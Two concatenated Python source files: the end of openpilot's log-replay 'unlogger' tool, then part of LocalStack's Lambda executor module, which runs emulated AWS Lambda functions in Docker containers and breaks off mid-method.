            'deviceState', 'can', 'pandaState', 'sensorEvents', 'gpsNMEA', 'roadCameraState', 'roadEncodeIdx',
            'modelV2', 'liveLocation',
        ]
    elif args.enabled is not None:
        mocked = args.enabled
    else:
        mocked = service_list.keys()
    # Default: publish each service under its own name.
    mapping = {service_name: service_name for service_name in mocked}
    mapping.update(dict(args.address_mapping))
    for name in args.disabled:
        mapping.pop(name, None)
    unknown = set(mapping) - set(service_list)
    if unknown:
        print("WARNING: Unknown services {}".format(list(unknown)))
    return mapping
def keyboard_controller_thread(q, route_start_time):
    """Read single keypresses and translate them into seek/pause commands on *q*."""
    print("keyboard waiting for input")
    kb = KBHit()
    while 1:
        c = kb.getch()
        if c == 'm':  # Move forward by 1m
            q.send_pyobj(SeekRelativeTime(60))
        elif c == 'M':  # Move backward by 1m
            q.send_pyobj(SeekRelativeTime(-60))
        elif c == 's':  # Move forward by 10s
            q.send_pyobj(SeekRelativeTime(10))
        elif c == 'S':  # Move backward by 10s
            q.send_pyobj(SeekRelativeTime(-10))
        elif c == 'G':  # Seek back to the start of the route
            q.send_pyobj(SeekAbsoluteTime(0.))
        elif c == "\x20":  # Space bar.
            q.send_pyobj(TogglePause())
        elif c == "\n":
            # Enter: prompt for an absolute time (float seconds or timestamp).
            try:
                seek_time_input = input('time: ')
                seek_time = absolute_time_str(seek_time_input, route_start_time)
                # If less than 60, assume segment number
                if seek_time < 60:
                    seek_time *= 60
                q.send_pyobj(SeekAbsoluteTime(seek_time))
            except Exception as e:
                print("Time not understood: {}".format(e))
def get_arg_parser():
    """Build the command-line parser for the unlogger tool."""
    parser = argparse.ArgumentParser(
        description="Mock openpilot components by publishing logged messages.",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)

    # Local converters for the composite argument types.
    def _pair(value):
        return value.split("=")

    def _csv(value):
        return value.split(",")

    # NOTE: positional registration order (route_name, data_dir,
    # address_mapping) determines how argparse assigns the positionals.
    parser.add_argument("route_name", type=(lambda x: x.replace("#", "|")), nargs="?",
                        help="The route whose messages will be published.")
    parser.add_argument("data_dir", nargs='?', default=os.getenv('UNLOGGER_DATA_DIR'),
                        help="Path to directory in which log and camera files are located.")
    parser.add_argument("--no-loop", action="store_true", help="Stop at the end of the replay.")
    parser.add_argument("address_mapping", nargs="*", type=_pair,
                        help="Pairs <service>=<zmq_addr> to publish <service> on <zmq_addr>.")

    to_mock_group = parser.add_mutually_exclusive_group()
    to_mock_group.add_argument("--min", action="store_true", default=os.getenv("MIN"))
    to_mock_group.add_argument("--enabled", default=os.getenv("ENABLED"), type=_csv)

    parser.add_argument("--disabled", type=_csv, default=os.getenv("DISABLED") or ())
    parser.add_argument(
        "--tl", dest="publish_time_length", type=float, default=None,
        help="Length of interval in event time for which messages should be published.")
    parser.add_argument(
        "--no-realtime", dest="realtime", action="store_false", default=True,
        help="Publish messages as quickly as possible instead of realtime.")
    parser.add_argument(
        "--no-interactive", dest="interactive", action="store_false", default=True,
        help="Disable interactivity.")
    parser.add_argument(
        "--bind-early", action="store_true", default=False,
        help="Bind early to avoid dropping messages.")
    parser.add_argument(
        "--no-visionipc", action="store_true", default=False,
        help="Do not output video over visionipc")
    parser.add_argument(
        "--start-time", type=float, default=0.,
        help="Seek to this absolute time (in seconds) upon starting playback.")
    return parser
def main(argv):
    """Entry point: spawn the worker (log reading) and control (publishing)
    processes, then run the keyboard UI or wait for the children.

    argv: command-line arguments, excluding the program name.
    Returns 0 on clean shutdown.
    """
    # Fix: honor the argv parameter -- previously sys.argv[1:] was re-read,
    # silently ignoring the arguments the caller passed in.
    args = get_arg_parser().parse_args(argv)

    # Unique IPC endpoints so concurrent unlogger instances don't collide.
    command_address = "ipc:///tmp/{}".format(uuid4())
    forward_commands_address = "ipc:///tmp/{}".format(uuid4())
    data_address = "ipc:///tmp/{}".format(uuid4())

    address_mapping = _get_address_mapping(args)

    command_sock = zmq.Context.instance().socket(zmq.PUSH)
    command_sock.connect(command_address)

    if args.route_name is not None:
        # Route names of the form "<dongle>|<timestamp>" carry a start time.
        route_name_split = args.route_name.split("|")
        if len(route_name_split) > 1:
            route_start_time = timestamp_to_s(route_name_split[1])
        else:
            route_start_time = 0
        command_sock.send_pyobj(
            SetRoute(args.route_name, args.start_time, args.data_dir))
    else:
        print("waiting for external command...")
        route_start_time = 0

    subprocesses = {}
    try:
        subprocesses["data"] = multiprocessing.Process(
            target=UnloggerWorker().run,
            args=(forward_commands_address, data_address, address_mapping.copy()))

        subprocesses["control"] = multiprocessing.Process(
            target=unlogger_thread,
            args=(command_address, forward_commands_address, data_address, args.realtime,
                  _get_address_mapping(args), args.publish_time_length, args.bind_early, args.no_loop, args.no_visionipc))

        subprocesses["data"].start()
        subprocesses["control"].start()

        # Exit if any of the children die.
        def exit_if_children_dead(*_):
            for _, p in subprocesses.items():
                if not p.is_alive():
                    [p.terminate() for p in subprocesses.values()]
                    exit()
            # No child has died; ignore further SIGCHLD from normal reaping.
            signal.signal(signal.SIGCHLD, signal.SIG_IGN)
        signal.signal(signal.SIGCHLD, exit_if_children_dead)

        if args.interactive:
            keyboard_controller_thread(command_sock, route_start_time)
        else:
            # Wait forever for children.
            while True:
                time.sleep(10000.)
    finally:
        for p in subprocesses.values():
            if p.is_alive():
                # Fix: Process.join(timeout) never raises TimeoutError -- it
                # just returns -- so the old `except multiprocessing.TimeoutError`
                # was dead code and stuck children were never terminated.
                # Check liveness after the join instead.
                p.join(3.)
                if p.is_alive():
                    p.terminate()
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
|
lambda_executors.py | import base64
import contextlib
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
from multiprocessing import Process, Queue
from typing import Any, Dict, List, Optional, Tuple, Union
from localstack import config
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8,
LAMBDA_RUNTIME_JAVA8_AL2,
LAMBDA_RUNTIME_JAVA11,
LAMBDA_RUNTIME_PROVIDED,
)
from localstack.services.install import GO_LAMBDA_RUNTIME, INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.aws_models import LambdaFunction
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched, store_cloudwatch_logs
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
get_all_subclasses,
get_free_tcp_port,
in_docker,
json_safe,
last_index_of,
long_uid,
md5,
now,
run,
save_file,
short_uid,
to_bytes,
to_str,
)
from localstack.utils.docker import DOCKER_CLIENT, ContainerException, PortMappings
from localstack.utils.run import FuncThread
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
# Java entry point class used to run Lambda handlers locally
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
# env var name AWS uses to communicate the handler to the runtime
LAMBDA_HANDLER_ENV_VAR_NAME = "_HANDLER"
# glob pattern for temporary event payload files handed to executors
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.TMP_FOLDER
# port ranges reserved for lambda servers / APIs (see usages)
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# upper bound for the length of environment arguments (see usages)
MAX_ENV_ARGS_LENGTH = 20000
# prefix marking internal daemon log lines
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
class InvocationException(Exception):
    """Raised when a Lambda invocation fails; carries the captured log output
    and an optional partial result."""

    def __init__(self, message, log_output, result=None):
        super().__init__(message)
        self.log_output = log_output
        self.result = result
class AdditionalInvocationOptions:
    """Extra invocation tweaks contributed by executor plugins.

    `files_to_add` maps file keys to local paths; a key may appear as a
    placeholder inside `env_updates` values or command args — e.g.
    files_to_add={"f1": "/local/path"} with env_updates={"MYENV": "{f1}"}
    makes the file reachable by the handler and points MYENV at its
    Lambda-side path (locally, or inside Docker).
    """

    # file key -> local file path (keys usable as placeholders, see above)
    files_to_add: Dict[str, str]
    # environment variable updates to apply for the invocation
    env_updates: Dict[str, str]
    # replacement command for starting the Lambda process, if any
    updated_command: Optional[str]

    def __init__(self, files_to_add=None, env_updates=None, updated_command=None):
        self.files_to_add = files_to_add or {}
        self.env_updates = env_updates or {}
        self.updated_command = updated_command
class InvocationResult:
    """Outcome of a Lambda invocation: the result payload plus captured logs."""

    def __init__(self, result, log_output=""):
        # Guard against accidentally nesting one InvocationResult in another.
        if isinstance(result, InvocationResult):
            raise Exception("Unexpected invocation result type: %s" % result)
        self.result = result
        self.log_output = log_output if log_output else ""
class InvocationContext:
    """Per-invocation state handed to Lambda executors and plugins."""

    lambda_function: LambdaFunction
    event: Dict[str, Any]
    lambda_command: str  # TODO: change to List[str] ?
    docker_flags: str  # TODO: change to List[str] ?
    environment: Dict[str, str]
    context: Dict[str, Any]

    def __init__(
        self,
        lambda_function: LambdaFunction,
        event: Dict,
        environment=None,
        context=None,
        lambda_command=None,
        docker_flags=None,
    ):
        self.lambda_function = lambda_function
        self.event = event
        self.environment = environment if environment is not None else {}
        self.context = context if context is not None else {}
        self.lambda_command = lambda_command
        self.docker_flags = docker_flags
class LambdaExecutorPlugin:
    """Hook interface for extending the behavior of the Lambda executors."""

    INSTANCES: List["LambdaExecutorPlugin"] = []

    def initialize(self):
        """One-time setup (e.g., downloading dependencies). Lazy: runs only
        after the first should_apply() call that returns True."""
        pass

    def should_apply(self, context: InvocationContext) -> bool:
        """Decide whether this plugin participates in the given invocation."""
        return False

    def prepare_invocation(
        self, context: InvocationContext
    ) -> Optional[AdditionalInvocationOptions]:
        """Contribute extra files/env/command options for the invocation."""
        return None

    def process_result(
        self, context: InvocationContext, result: InvocationResult
    ) -> InvocationResult:
        """Post-process (and possibly replace) the invocation result."""
        return result

    def init_function_configuration(self, lambda_function: LambdaFunction):
        """Hook run when a function's configuration is created or updated."""
        pass

    def init_function_code(self, lambda_function: LambdaFunction):
        """Hook run when a function's code is created or updated."""
        pass

    @classmethod
    def get_plugins(cls) -> List["LambdaExecutorPlugin"]:
        """Return lazily created singleton instances of all plugin subclasses."""
        if not cls.INSTANCES:
            plugin_classes = get_all_subclasses(LambdaExecutorPlugin)
            cls.INSTANCES = [plugin_class() for plugin_class in plugin_classes]
        return cls.INSTANCES
def get_from_event(event: Dict, key: str):
    """Retrieve a field with the given key from the first record in event["Records"].

    Returns None if the event has no "Records" entry, the record list is empty,
    the key is missing, or the event is not a dict (e.g., None or a plain list).
    """
    try:
        return event["Records"][0][key]
    except (KeyError, IndexError, TypeError):
        # be lenient: a missing "Records" key (KeyError), an empty record list
        # (IndexError), or a non-dict event such as None (TypeError) all mean
        # "field not present" - callers pass arbitrary event payloads here
        return None
def is_java_lambda(lambda_details):
    """Whether the given runtime string (or object exposing .runtime) is a Java runtime."""
    runtime = getattr(lambda_details, "runtime", lambda_details)
    return runtime in (LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA8_AL2, LAMBDA_RUNTIME_JAVA11)
def is_nodejs_runtime(lambda_details):
    """Whether the given runtime string (or object exposing .runtime) is a Node.js runtime."""
    runtime = getattr(lambda_details, "runtime", lambda_details)
    return (runtime or "").startswith("nodejs")
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
    """Persist the given Lambda log output to the function's CloudWatch log group/stream."""
    invocation_time = invocation_time or int(time.time() * 1000)
    container_id = container_id or short_uid()
    # stream names follow the AWS convention "YYYY/MM/DD/[LATEST]<container-id>"
    date_str = time.strftime("%Y/%m/%d", time.gmtime(int(invocation_time / 1000)))
    log_stream_name = "%s/[LATEST]%s" % (date_str, container_id)
    log_group_name = "/aws/lambda/%s" % func_details.name()
    return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
    """Determine the endpoint host that Lambda containers should use to reach LocalStack.

    The container IP lookup runs at most once and is cached in the
    DOCKER_MAIN_CONTAINER_IP global (False marks "lookup already attempted").
    A configured HOSTNAME_FROM_LAMBDA always takes precedence and skips the lookup.
    """
    global DOCKER_MAIN_CONTAINER_IP
    if not config.HOSTNAME_FROM_LAMBDA and DOCKER_MAIN_CONTAINER_IP is None:
        # mark the lookup as attempted up-front, so a failure below is not retried on every call
        DOCKER_MAIN_CONTAINER_IP = False
        try:
            if in_docker():
                DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
                LOG.info("Determined main container target IP: %s" % DOCKER_MAIN_CONTAINER_IP)
        except Exception as e:
            container_name = bootstrap.get_main_container_name()
            LOG.info(
                'Unable to get IP address of main Docker container "%s": %s' % (container_name, e)
            )
    # return (1) predefined endpoint host, or (2) main container IP, or (3) Docker host (e.g., bridge IP)
    return (
        config.HOSTNAME_FROM_LAMBDA or DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
    )
def rm_docker_container(container_name_or_id, check_existence=False, safe=False):
    """Remove the given Docker container; with safe=True, swallow removal errors.

    TODO: remove method / move to docker module
    """
    if not container_name_or_id:
        return
    if check_existence:
        # TODO: check names as well as container IDs!
        if container_name_or_id not in DOCKER_CLIENT.get_running_container_names():
            return
    try:
        DOCKER_CLIENT.remove_container(container_name_or_id)
    except Exception:
        if safe:
            return
        raise
class LambdaAsyncLocks:
    """Thread-safe registry of locks/semaphores used to serialize async Lambda invocations."""

    locks: Dict[str, Union[threading.Semaphore, threading.Lock]]
    creation_lock: threading.Lock

    def __init__(self):
        self.locks = {}
        self.creation_lock = threading.Lock()

    def assure_lock_present(
        self, key: str, lock: Union[threading.Semaphore, threading.Lock]
    ) -> Union[threading.Semaphore, threading.Lock]:
        """Register 'lock' under 'key' unless one already exists; return the registered lock."""
        with self.creation_lock:
            if key not in self.locks:
                self.locks[key] = lock
            return self.locks[key]
# module-level singleton holding the per-function async invocation locks
LAMBDA_ASYNC_LOCKS = LambdaAsyncLocks()
class LambdaExecutor(object):
    """Base class for Lambda executors. Subclasses must overwrite the _execute method"""

    def __init__(self):
        # keeps track of each function arn and the last time it was invoked
        self.function_invoke_times = {}

    def _prepare_environment(self, func_details):
        """Return a copy of the function's env vars with test AWS credentials/region injected."""
        # setup environment pre-defined variables for docker environment
        result = func_details.envvars.copy()
        # injecting aws credentials into docker environment if not provided
        aws_stack.inject_test_credentials_into_env(result)
        # injecting the region into the docker environment
        aws_stack.inject_region_into_env(result, func_details.region())
        return result

    def execute(
        self,
        func_arn,
        func_details,
        event,
        context=None,
        version=None,
        asynchronous=False,
        callback=None,
        lock_discriminator: Optional[str] = None,
    ):
        """Invoke the Lambda given by func_arn/func_details with the given event.

        :param asynchronous: if True, run in a background thread and return a placeholder result
        :param callback: called as callback(result, func_arn, event, error=..., dlq_sent=...)
            after each attempt, on success and on failure alike
        :param lock_discriminator: key of a lock previously registered in LAMBDA_ASYNC_LOCKS,
            used to serialize/limit concurrent executions of this function
        :return: InvocationResult of the handler, or a placeholder InvocationResult if asynchronous
        """

        def do_execute(*args):
            @cloudwatched("lambda")
            def _run(func_arn=None):
                with contextlib.ExitStack() as stack:
                    if lock_discriminator:
                        stack.enter_context(LAMBDA_ASYNC_LOCKS.locks[lock_discriminator])
                    # set the invocation time in milliseconds
                    invocation_time = int(time.time() * 1000)
                    # start the execution
                    raised_error = None
                    result = None
                    dlq_sent = None
                    try:
                        result = self._execute(func_arn, func_details, event, context, version)
                    except Exception as e:
                        raised_error = e
                        # for async invocations, failed events are forwarded to a dead letter queue
                        if asynchronous:
                            if get_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
                                sqs_queue_arn = get_from_event(event, "eventSourceARN")
                                if sqs_queue_arn:
                                    # event source is SQS, send event back to dead letter queue
                                    dlq_sent = sqs_error_to_dead_letter_queue(
                                        sqs_queue_arn, event, e
                                    )
                            else:
                                # event source is not SQS, send back to lambda dead letter queue
                                lambda_error_to_dead_letter_queue(func_details, event, e)
                        raise e
                    finally:
                        # always record the invocation time and notify callback/destinations,
                        # in the success and the error case alike
                        self.function_invoke_times[func_arn] = invocation_time
                        callback and callback(
                            result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
                        )
                        lambda_result_to_destination(
                            func_details, event, result, asynchronous, raised_error
                        )
                    # return final result
                    return result

            return _run(func_arn=func_arn)

        # Inform users about asynchronous mode of the lambda execution.
        if asynchronous:
            LOG.debug(
                "Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
            )
            FuncThread(do_execute).start()
            return InvocationResult(None, log_output="Lambda executed asynchronously.")
        return do_execute()

    def _execute(self, func_arn, func_details, event, context=None, version=None):
        """This method must be overwritten by subclasses."""
        raise NotImplementedError

    def startup(self):
        """Called once during startup - can be used, e.g., to prepare Lambda Docker environment"""
        pass

    def cleanup(self, arn=None):
        """Clean up left-over resources (e.g., Docker containers) - invoked on startup and
        shutdown; if 'arn' is given, clean up only the resources of that function."""
        pass

    def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
        """Make the given file available to the Lambda process (e.g., by copying into the container) for the
        given invocation context; Returns the path to the file that will be available to the Lambda handler."""
        raise NotImplementedError

    def apply_plugin_patches(self, inv_context: InvocationContext):
        """Loop through the list of plugins, and apply their patches to the invocation context (if applicable)"""
        for plugin in LambdaExecutorPlugin.get_plugins():
            if not plugin.should_apply(inv_context):
                continue
            # initialize, if not done yet
            if not hasattr(plugin, "_initialized"):
                LOG.debug("Initializing Lambda executor plugin %s", plugin.__class__)
                plugin.initialize()
                plugin._initialized = True
            # invoke plugin to prepare invocation
            inv_options = plugin.prepare_invocation(inv_context)
            if not inv_options:
                continue
            # copy files
            file_keys_map = {}
            for key, file_path in inv_options.files_to_add.items():
                file_in_container = self.provide_file_to_lambda(file_path, inv_context)
                file_keys_map[key] = file_in_container
            # replace placeholders like "{<fileKey>}" with corresponding file path
            for key, file_path in file_keys_map.items():
                for env_key, env_value in inv_options.env_updates.items():
                    inv_options.env_updates[env_key] = str(env_value).replace(
                        "{%s}" % key, file_path
                    )
                if inv_options.updated_command:
                    inv_options.updated_command = inv_options.updated_command.replace(
                        "{%s}" % key, file_path
                    )
                    inv_context.lambda_command = inv_options.updated_command
            # update environment
            inv_context.environment.update(inv_options.env_updates)

    def process_result_via_plugins(
        self, inv_context: InvocationContext, invocation_result: InvocationResult
    ) -> InvocationResult:
        """Loop through the list of plugins, and apply their post-processing logic to the Lambda invocation result."""
        for plugin in LambdaExecutorPlugin.get_plugins():
            if not plugin.should_apply(inv_context):
                continue
            invocation_result = plugin.process_result(inv_context, invocation_result)
        return invocation_result
class ContainerInfo:
    """Contains basic information about a docker container."""

    def __init__(self, name, entry_point):
        # container name, plus the default entry point of the container image
        self.entry_point = entry_point
        self.name = name
class LambdaExecutorContainers(LambdaExecutor):
    """Abstract executor class for executing Lambda functions in Docker containers"""

    def execute_in_container(
        self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
    ) -> Tuple[bytes, bytes]:
        """Run the given command for the function in a container; return (stdout, stderr)."""
        raise NotImplementedError

    def run_lambda_executor(self, event=None, func_details=None, env_vars=None, command=None):
        """Prepare env vars/stdin for the given event, execute the Lambda in a container,
        and post-process the container output into an InvocationResult.

        :raises InvocationException: if the container execution failed
        """
        env_vars = dict(env_vars or {})
        runtime = func_details.runtime or ""
        stdin_str = None
        event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
        event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
        event_body = event_body or ""
        is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH

        is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
        if (
            not is_large_event
            and func_details
            and is_provided
            and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
        ):
            # Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
            # the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
            env_updates = {
                "AWS_LAMBDA_EVENT_BODY": to_str(
                    event_body
                ),  # Note: seems to be needed for provided runtimes!
                "DOCKER_LAMBDA_USE_STDIN": "1",
            }
            env_vars.update(env_updates)
            # Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
            env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)

        if is_large_event:
            # in case of very large event payloads, we need to pass them via stdin
            LOG.debug(
                "Received large Lambda event payload (length %s) - passing via stdin"
                % len(event_body)
            )
            env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"

        if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
            stdin_str = event_body
            if not is_provided:
                env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
        elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
            env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)

        # apply plugin patches
        inv_context = InvocationContext(func_details, event, environment=env_vars)
        self.apply_plugin_patches(inv_context)

        docker_flags = config.LAMBDA_DOCKER_FLAGS or ""
        if inv_context.docker_flags:
            docker_flags = f"{docker_flags} {inv_context.docker_flags}"

        event_stdin_bytes = stdin_str and to_bytes(stdin_str)
        error = None
        try:
            result, log_output = self.execute_in_container(
                func_details, env_vars, command, docker_flags=docker_flags, stdin=event_stdin_bytes
            )
        except ContainerException as e:
            result = e.stdout or ""
            log_output = e.stderr or ""
            error = e
        try:
            result = to_str(result).strip()
        except Exception:
            pass
        log_output = to_str(log_output).strip()
        # Note: The user's code may have been logging to stderr, in which case the logs
        # will be part of the "result" variable here. Hence, make sure that we extract
        # only the *last* line of "result" and consider anything above that as log output.
        if isinstance(result, str) and "\n" in result:
            lines = result.split("\n")
            idx = last_index_of(
                lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
            )
            if idx >= 0:
                result = lines[idx]
                additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
                log_output += "\n%s" % additional_logs

        log_formatted = log_output.strip().replace("\n", "\n> ")
        func_arn = func_details and func_details.arn()
        LOG.debug(
            "Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
        )

        # store log output - TODO get live logs from `process` above?
        _store_logs(func_details, log_output)

        if error:
            raise InvocationException(
                "Lambda process returned with error. Result: %s. Output:\n%s"
                % (result, log_output),
                log_output,
                result,
            ) from error

        # create result
        invocation_result = InvocationResult(result, log_output=log_output)
        # run plugins post-processing logic
        invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
        return invocation_result

    def prepare_event(self, environment: Dict, event_body: str) -> bytes:
        """Return the event as a stdin string."""
        # amend the environment variables for execution
        environment["AWS_LAMBDA_EVENT_BODY"] = event_body
        return event_body.encode()

    def _execute(
        self, func_arn: str, func_details: LambdaFunction, event: Dict, context=None, version=None
    ):
        """Build the container environment for the invocation and delegate to run_lambda_executor()."""
        runtime = func_details.runtime
        handler = func_details.handler
        environment = self._prepare_environment(func_details)

        # configure USE_SSL in environment
        if config.USE_SSL:
            environment["USE_SSL"] = "1"

        # prepare event body
        if not event:
            LOG.info('Empty event body specified for invocation of Lambda "%s"' % func_arn)
            event = {}
        event_body = json.dumps(json_safe(event))
        event_bytes_for_stdin = self.prepare_event(environment, event_body)

        Util.inject_endpoints_into_env(environment)
        environment["EDGE_PORT"] = str(config.EDGE_PORT)
        environment[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
        if os.environ.get("HTTP_PROXY"):
            environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
        if func_details.timeout:
            environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(func_details.timeout)
        if context:
            environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
            environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
            environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
            environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
            if context.client_context is not None:
                environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
                    to_str(base64.b64decode(to_bytes(context.client_context)))
                )

        # pass JVM options to the Lambda environment, if configured
        if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
            if environment.get("JAVA_TOOL_OPTIONS"):
                LOG.info(
                    "Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
                )
            else:
                LOG.debug(
                    "Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s"
                    % config.LAMBDA_JAVA_OPTS
                )
                environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS

        # accept any self-signed certificates for outgoing calls from the Lambda
        if is_nodejs_runtime(runtime):
            environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"

        # run Lambda executor and fetch invocation result
        LOG.info("Running lambda: %s" % func_details.arn())
        result = self.run_lambda_executor(
            event=event_bytes_for_stdin, env_vars=environment, func_details=func_details
        )
        return result

    def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
        """Mount the given local file into the Lambda container via a Docker volume flag;
        return the path under which the file is visible inside the container."""
        if config.LAMBDA_REMOTE_DOCKER:
            LOG.info("TODO: copy file into container for LAMBDA_REMOTE_DOCKER=1 - %s", local_file)
            return local_file

        mountable_file = Util.get_host_path_for_path_in_docker(local_file)
        _, extension = os.path.splitext(local_file)
        target_file_name = f"{md5(local_file)}{extension}"
        target_path = f"/tmp/{target_file_name}"
        # fix: append the volume flag separated by a space - a plain "+=" would fuse
        # "-v ..." onto any pre-existing flags and produce malformed Docker flags
        existing_flags = inv_context.docker_flags or ""
        separator = " " if existing_flags else ""
        inv_context.docker_flags = f"{existing_flags}{separator}-v {mountable_file}:{target_path}"
        return target_path
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
    """Executor class for executing Lambda functions in re-usable Docker containers"""

    def __init__(self):
        super(LambdaExecutorReuseContainers, self).__init__()
        # locking thread for creation/destruction of docker containers.
        self.docker_container_lock = threading.RLock()

        # On each invocation we try to construct a port unlikely to conflict
        # with a previously invoked lambda function. This is a problem with at
        # least the lambci/lambda:go1.x container, which execs a go program that
        # attempts to bind to the same default port.
        self.next_port = 0
        self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
        self.port_offset = LAMBDA_SERVER_PORT_OFFSET

    def execute_in_container(
        self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
    ) -> Tuple[bytes, bytes]:
        """Run the handler command inside the (primed) per-function container via docker exec."""
        func_arn = func_details.arn()
        lambda_cwd = func_details.cwd
        runtime = func_details.runtime
        handler = func_details.handler

        # check whether the Lambda has been invoked before
        has_been_invoked_before = func_arn in self.function_invoke_times

        # Choose a port for this invocation
        with self.docker_container_lock:
            env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
            self.next_port = (self.next_port + 1) % self.max_port

        # create/verify the docker container is running.
        LOG.debug(
            'Priming docker container with runtime "%s" and arn "%s".',
            runtime,
            func_arn,
        )
        container_info = self.prime_docker_container(
            func_details, dict(env_vars), lambda_cwd, docker_flags
        )

        if not command and handler:
            command = container_info.entry_point.split()
            command.append(handler)

        # determine files to be copied into the container
        if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
            # if this is the first invocation: copy the entire folder into the container
            DOCKER_CLIENT.copy_into_container(
                container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
            )

        return DOCKER_CLIENT.exec_in_container(
            container_name_or_id=container_info.name,
            command=command,
            interactive=True,
            env_vars=env_vars,
            stdin=stdin,
        )

    def _execute(self, func_arn, *args, **kwargs):
        """Serialize invocations per function ARN, then delegate to the parent implementation."""
        if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
            concurrency_lock = threading.RLock()
            LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
        with LAMBDA_CONCURRENCY_LOCK[func_arn]:
            return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)

    def startup(self):
        """Remove any stale containers from previous runs, then start the idle-container reaper."""
        self.cleanup()
        # start a process to remove idle containers
        if config.LAMBDA_REMOVE_CONTAINERS:
            self.start_idle_container_destroyer_interval()

    def cleanup(self, arn=None):
        """Destroy the container of the given function ARN, or all Lambda containers if arn is None."""
        if arn:
            self.function_invoke_times.pop(arn, None)
            return self.destroy_docker_container(arn)
        self.function_invoke_times = {}
        return self.destroy_existing_docker_containers()

    def prime_docker_container(self, func_details, env_vars, lambda_cwd, docker_flags=None):
        """
        Prepares a persistent docker container for a specific function.
        :param func_details: The Details of the lambda function.
        :param env_vars: The environment variables for the lambda.
        :param lambda_cwd: The local directory containing the code for the lambda function.
        :param docker_flags: Additional flags to pass to the container on creation.
        :return: ContainerInfo class containing the container name and default entry point.
        """
        with self.docker_container_lock:
            # Get the container name and id.
            func_arn = func_details.arn()
            container_name = self.get_container_name(func_arn)

            status = self.get_docker_container_status(func_arn)
            LOG.debug('Priming Docker container (status "%s"): %s' % (status, container_name))

            docker_image = Util.docker_image_for_lambda(func_details)

            # Container is not running or doesn't exist.
            if status < 1:
                # Make sure the container does not exist in any form/state.
                self.destroy_docker_container(func_arn)

                # get container startup command and run it
